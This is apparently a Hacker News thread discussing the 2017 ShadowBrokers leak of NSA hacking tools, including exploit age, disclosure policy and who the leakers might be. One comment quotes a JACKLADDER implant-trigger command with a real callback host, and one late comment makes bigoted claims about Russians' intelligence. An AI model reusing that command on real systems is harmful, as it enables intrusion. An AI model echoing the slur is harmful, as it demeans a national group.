When Federal agencies discover a new vulnerability in commercial
and open source software – a so-called “Zero day” vulnerability
because the developers of the vulnerable software have had zero days
to fix it – it is in the national interest to responsibly
disclose the vulnerability rather than to hold it for an investigative
or intelligence purpose.
> Unless there is a clear national security or law enforcement need, this process is biased toward responsibly disclosing such vulnerabilities.
...due to the fact that most of the EQG vulnerabilities appear to be crafted for specific collection targets, not stumbled upon and held onto for fun.
Intuitively it seems when the same agency performs both roles it creates a conflict of interest and bias against disclosure.
The origin of 0-day (zero-day) in hacking (etymology of zero-day): http://bjorn.kuiper.nu/tag/zero-day/
I've looked through some of the contents.. Some look incredibly old, but others target odd things.. lots of cPanel. My only guess is take the low hanging fruit to build "jump box" type systems?
Some odd examples: ElegantEagle/toffeehammer.. focuses on cgiecho for RCE. The thing is, a CVE was just released for this case maybe a month ago?: http://www.cvedetails.com/cve/CVE-2017-5613/
So if this dump was from 2013, why did the CVE recently pop up? Or is that coincidence?
And the idea that you can figure out where someone is from by analyzing their written text is as fascinating as doing the same to their code.
That idea is quite well known, so it's likely that the post was written like that deliberately. I was just wondering if you could create a similar sounding post with a chain of people rewriting the original in their own words.
2017 in a nutshell right there.
Or it is Russian and they intentionally formulated this as cartoonesque Russian, so that everyone says "this can't possibly be Russian, it's someone who tries to put the blame on Russia".
The problem is that if this comes from a government power, it is likely that they have the resources to use some professional translators and/or linguists to make it look whatever they want it to look like.
Anything here that is not backed by other data is just pure speculation.
"TheShadowBrokers is having special trick or treat for Amerikanskis tonight."
https://medium.com/@shadowbrokerss/message-5-trick-or-treat-...
I suppose though, that "Amerikanski" might be used outside Russia. Serbia, Bulgaria? Misdirection seems more likely though.
A much more common mistake you will find is not knowing when to use "the" or "a".
Edit: unless it is a Russian pretending to be an American who is pretending to be Russian which, who the hell knows, anything is possible.
In English, the noun describing the nationality is also an adjective describing belonging to, or affiliation with, that nationality. E.g. "An American is driving an American car".
In Russian, this is not the case - they are different words, sharing the same root. Some examples (noun - adjective):
US: Amerikanets - Amerikanskiy EN: Anglichanin - Angliyskiy DE: Nemets - Nemetskiy AR: Arab - Arabskiy CN: Kitaets - Kitayskiy
There's one and only one exception, and that, ironically, is the word for "Russian": "russkiy". It's the same for both the noun and the adjective, and, as you can see by comparing it with the list above, morphologically it looks like an adjective. The historic explanation for that is that it originated from the time of the Varangian conquest of Eastern Slavic lands, when the population was referred as "the people of [belonging to] Rus" - "Russkie lyudi" - where Rus was the name of the Varangian tribe in question.
Anyway, what this means is that no native Russian speaker would use the word "Amerikanskiy" to refer to Americans. It only makes sense as an adjective in "American something". However, the addition of "-s" at the end to indicate plural unambiguously tells us that whoever wrote this, treated it as a noun. Which would make perfect sense for a native English speaker, for whom the two are naturally conflated.
And the most obvious explanation for that is that if you put the word "American" by itself into Google Translate, for example, it can't decide whether it's a noun or an adjective without context, so it has to assume one or the other. And it seems to be assuming adjective by default, so you get "Amerikanskiy" back.
Oh, and by the way, writing at as "Amerikanski", without the final "y", is also something that hints strongly that it's not a native speaker. A native speaker would likely transliterate it letter by letter, starting from Russian "Американский", yielding "Amerikanskiy". However, that final "y" is really short when spoken, which is why native English speakers often miss it entirely when transcribing.
On top of that, Polish uses "-ski" for the same words: "polski", "rosyjski", "angielski", "arabski" etc. In Polish, it's also a very common (and ethymologically related - think "of ...") ending for last names - e.g. Piłsudski. There are a lot more Poles, or at least families with Polish ancestry, in US in particular than there are Russians. As a result, Polish last names are pretty common and well-known, as is their spelling. So, that spelling is often applied to vaguely similarly looking and sounding Russian loanwords and transliterations, which also leads to dropping of that final "-y" in "-skiy".
So, definitely not Russian, and overall slightly more probable to be a native English speaker from US.
That's, of course, assuming that the wording wasn't deliberately mangled to look like fake Russian, in a double misdirection...
Sounds like a villian from a 60's Bond flick.
Anyway, while their nationality isn't obvious, their childishness is. I think that's the only detail that can really be gleaned from the text itself.
"Quick review of the #ShadowBrokers leak of Top Secret NSA tools reveals it's nowhere near the full library, but there's still so much here that NSA should be able to instantly identify where this set came from and how they lost it. If they can't, it's a scandal."
The security agencies might have made a lot of enemy over the years so it's not clear who benefits from this. Either financially or as ego boost.
The internet is definitely bigger that what most people might have predicted 20 years ago. So its not really a big surprising to see as much or even more power struggle than in real world battle fields.
Since every side has a propaganda to peddle, I, personally can draw no reasonable or coherent conclusions on what type of decisions are shaping the world I live in. But I am nonetheless curious to see how this all plays out in the coming years.
There is a related post on HN about this. [0]
---------------------------------
I don't necessarily subscribe to the whole "Russia is controlling everything" line (there still so much that's unknown for sure), but it sure is easy to see a connection between Trump launching missiles against Syria which is supported by Russia, and with an embarrassing and costly release of secret information belonging to the security apparatus in the U.S. by what many people say is a front for the Russian security apparatus. Whether that connection is really there is another thing, but that narrative sure is easy to follow.
I have difficulties interpreting your statement. Are you implying US security services are "a front for the rudsian security apparatus"?
I wouldn't interpret that that tweet as "lost control of its full arsenal". It seems that say that, but then it's a tweet and length-limited. Maybe let's just wait until a more nuanced analysis surfaces?
B) This dump is from 2013, not long after Snowden left, so still relevant to his knowledge on the subject. Although he wasn't trained for TAO.
It couldn't be because perl is installed by default on all of the target platforms. Practicality trumps conference talks when there's work to be done, even in the government.
Whereas, the NSA's project failed initially because the team couldn't design a security kernel that had great security and acceptable performance. Told NSA they'd have to pick one. Schell told NSA he knew a guy with a design, GEMSOS, with both properties. NSA reluctantly used GEMSOS in BLACKER. The first, highly-secure VPN w/ general-purpose kernel was born. Who knows what the deployment or usability side of it was, though. Classification rules kept them from publishing on it for a decade or so where it then got paywalled. Classification is probably why Larry Walls didn't say much about BLACKER when describing its history. At least ones I read.
A few points of note: it's rather weird to call BLACKER a "VPN"; it's likely much broader than this (it's a network, crypto suite, secure kernel, system architecture, etc), and yet encompasses a very different goal. In fact, the degree to which it originates out of secure kernel research is, we argue in our paper, somewhat unclear, and perhaps this is only a small part of the equation.
If anyone has any additional information about these early architectures, I would love to speak with you, contact me at http://iqdupont.com.
To me it seems impossible that non-state-sponsored hackers would have gotten their hands into top secret NSA hacking tools. If I'd have guess it would seem that TheShadowBrokers are "useful idiots" that Russia gives information in the way they did (probably) with Wikileaks. The real question is why would anyone leak these files at this very moment? Did it take this long to get angry at Trump or are there some others factors at play?
About as impossible as the Snowden exfiltration, so that makes it entirely believable.
All it takes is one rogue employee or plant. And if you don't want to burn an inside asset it would pay off to release files that are several years old.
# ELATEDMONKEY is a local privelege escalation exploit against systems running the cPanel Remote Management Web Interface, at least through version 24, and probably future versions too (althogh that should be checked before throwing).
It has been tested explicitly on cPanel 11.23.3 and 11.24.4 running CentOS 5.2 Linux
--
Those versions are from 2008/2009
Don't underestimate the ability of failing smbs to dismiss the risks involved with that when they can't pay to fix it.
He notes that though much is targeted at older systems, a few things that look yet-unpatched.
https://twitter.com/ncweaver/status/850797548717481984
the grugq: "Calling it now: the first ShadowBrokers dump was an expensive signal. This latest one was not (expensive, that is.)"
- Don’t care if you swapped wives with Mr Putin, double down on it, “Putin is not just my firend he is my BFF”.
- Don’t care if the election was hacked or rigged, celebrate it “so what if I did, what are you going to do about it”.
This has got to be a fake group trying to discredit Trump right? I don't like him or what he's doing, but surely surely his supporters don't subscribe to at least the latter view there?
You must not have very many conservative friends on Facebook. "Russia didn't write the emails" has to be one of the most popular memes of the last 6 months.
I don't know any conservatives but every single leftist I know thinks that russophobia is at absolutely deranged levels, as a vehicle for Clinton apologism.
The idea that "Russia decided the election" is absurd, but repeated often enough, is starting to be taken as truth by those who find it palatable.
Also, a lot of the tools appear to instruct people to paste various things in to them. I find it unlikely that a single person wrote all the tooling for the NSA, but, who knows.
This is just inaccurate, or at least purposefully misleading. The NSA did not just lose control of its "Top Secret arsenal of digital weapons".
They "lost control" of mainly a bunch of old exploits whose release will not matter because anyone who is running this old junk won't be updating their servers because of this news.
211.40.103.194 - http://utc21.co.kr - Korea
from: https://github.com/x0rz/EQGRP/blob/master/Linux/etc/opscript...
#### JACKLADDER - triggering IN thru JACKPOP on Linux (FAINTSPIRIT) ####
### Local window, let this sit and wait: ourtn -T 202.38.128.1 -n -I -ue -O 113 -p 443 -C 211.40.103.194 127.0.0.1
### on PITCH: set up window for nopen callback -nrtun 113
https://github.com/x0rz/EQGRP/blob/master/Linux/bin/xp_phpbb...
I only found that bad boy out after disabling some ciphers on some loadies which broke a lot of their stuff....
It looks like it's searching for files/directories with unusual names (like ". ") that system administrators wouldn't normally notice.
I'm not from the US and have not followed the news from there recently, but from what little I have seen much of the actual contents of the message does seem to reflect the feelings of Trumps "base"? Or would people more familiar with US politics say this is incorrect?
"Are you the sort of man who would put the poison in his own goblet? Now a clever man would put the poison into my goblet, because he would know that only a fool would drink the goblet given to him. I am not a fool, so clearly you wouldn't do that. But you must have known that I was not a great fool, so I mustn't drink from the wine in front of me!" [0]
Remember that even naming these two countries is a bias unless there is specific evidence. America and Russia are obvious suspects, but other countries (and even non-state actors).
There is very little actual evidence and far too much time spent on useless - and distracting - speculation.
> Even HN seems to have a "of course it's Russia" bias these days.
I suspect a lot of people are still using cold war era standards for how propaganda works. The modern methods[1] are a lot more subtle. A potential example might be this very thread where a lot of people seem to be wasting time speculating about the leak's origins instead of looking at the actual evidence that is available: the software itself.
[1] e.g. Russia's "non-linear warfare" methods that introduce as much confusing/distracting chaos as possible, or the psychological wedges JTRIG (GCHQ) uses to split communities before they grow into larger "problems".
Russians are known for what they themselves call "asymetrical answers", so this seems to fit the pattern.
Source: many conversations with Russians learning English (also near-native Russian)
ALLL RIIIIGHT!!
Not because I'm especially interested in the tools (although, granted, I have not had a look at any of them yet), but because I always wished this could be given to everyone.
Also, for a moment there, I was concerned 7z was insecure and that the passphrase had been bruteforced. Apparently not! Very nice.
This is disaster in my (current) opinion. We tend to dismiss the work the likes of NSA do, not thinking much about what would happen if they didn't do it. Snowden categorically dismissing anything that NSA does, just means he's a deluded idealist, much like I used to be.
That's not representative of Snowden's opinion at all. From the beginning he's always stated he believes in the mission of the intelligence agencies. Heck, he used to work for one.
"I am not trying to bring down the NSA, I am working to improve the NSA" [0]
[0] https://www.washingtonpost.com/world/national-security/edwar...
We make a kind of deal with our governments, some things we agree to be kept in the dark about for security reasons (specific intelligence or some clandestine operation or other) but I don't think that deal covers the kind of surveillance snowden exposed and I don't see at all how exposing the actions of our governments is deluded or idealistic: can you elaborate?
Why would you prefer not to know what your government is doing when knowing doesn't break the 'willful ignorance' contract we entrust these people with?
If I two terrorists agree to act when a nyan cat is posted on a specific Facebook account no neural network can help you manage the threat. Human based investigation and infiltration on the other hand can lead to real world judiciary actions.
Then, of course, there's also the objection that "keeping us safe" is not an absolute. There are many ways to keep people safe, but they're so extremely onerous that we don't practice them. Totalitarian societies with pervasive open surveillance (think 1984) are very safe, for example, but at what cost? So clearly there's a balance, and one can't just dismiss any concerns about the cost of that safety by saying that it's necessary - it has to be demonstrated that it is (i.e. that the gains from that increased safety justify the losses from intrusiveness).
"Just because you shot Jesse James, don’t make you Jesse James.”
Snowden is skilled at data theft and not a source of wisdom when it comes to surveillance.
The liberal media (hate to use that term) is equally complicit. They have trotted him around as source of wisdom. The leaker of Pentagon Papers had a position that allowed him to asses the subject matter. Snowden on the other hand was a sysadmin.
A lot of people died, it would be naive to think snowden's actions didn't contribute to it. However noble his intentions might be.
https://www.youtube.com/user/FPSRussia
100% American from Georgia, sometimes loses Russian accent and slips into perfect English:)
Could be Russia pissed about puppet twitching without permission, or could be Bannon (via Cambridge Analytics?) pissed about puppet twitching without permission.
Twitch, puppet, twitch!
but really, asymmetric information is asymmetric. We just don't know.
But now we can speculate that they are American citizens, with their mention of voting for the US President.
We've detached this subthread from https://news.ycombinator.com/item?id=14069328 and marked it off-topic.
Identifying specific malicious actors (and their origin) is tricky from a reader's POV, so the best I can personally do is not let ridiculous statements go unanswered. Ignorance is more common than malice, but I'm sure there's a bit of both in here today.
Or so a 2017 version of the "red scare" goes, so that the military industrial complex can sell more weapons and more "safety", and the fingers can keep being pointed at some enemy or another. That way their budgets get approved, some poor countries pay the toll (who cares anyway), and they might even be able to plunder them afterwards. Worked wonders the last 30+ years.
Not to mention that the US sponsors tons of NGOs, magazines, organizations, events, political parties, etc, with favorable views to its interest all over the world, and has done that none stop since at least WWII, meddling with elections, paying journalists, etc -- and when nothing else works.
It is Russians. The classic example of Dunning Kruger effect. In a generally low IQ environment and primitive criminalized cultural environment they truly believe that what is enough to fool everyone around them, including the bosses (who are supposed to be really smart), will surely fool everyone else.
This is the phenomenon of negative selection of a cancer-like corrupted society (which ran for a three decades already) at work. They are literally decades behind of the technological progress and culture of the modern civilization.
They simply have no idea of what possible level of intelligence and sophistication could be found in places with decades of consistent high-IQ-based selection, like companies staffed with top 5% of MIT/Standford/Caltech/Berkeley graduates and what this kind of organization could do (think of Apple, Google, etc).
A high-tech US govt agency would never had such a crap in their folders. They are not a bunch of disconnected from reality, overconfident, self-deluded with their own primitive propaganda Russian punks.